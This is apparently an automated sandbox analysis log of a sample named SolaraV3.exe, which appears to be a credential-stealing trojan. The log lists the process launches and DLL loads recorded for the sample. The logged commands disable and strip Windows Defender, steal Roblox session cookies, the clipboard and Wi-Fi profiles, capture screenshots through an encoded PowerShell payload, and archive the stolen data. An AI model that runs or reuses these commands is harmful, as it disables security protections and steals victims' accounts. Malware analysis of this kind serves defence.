              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePathJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: libffi-7.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: libssl-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
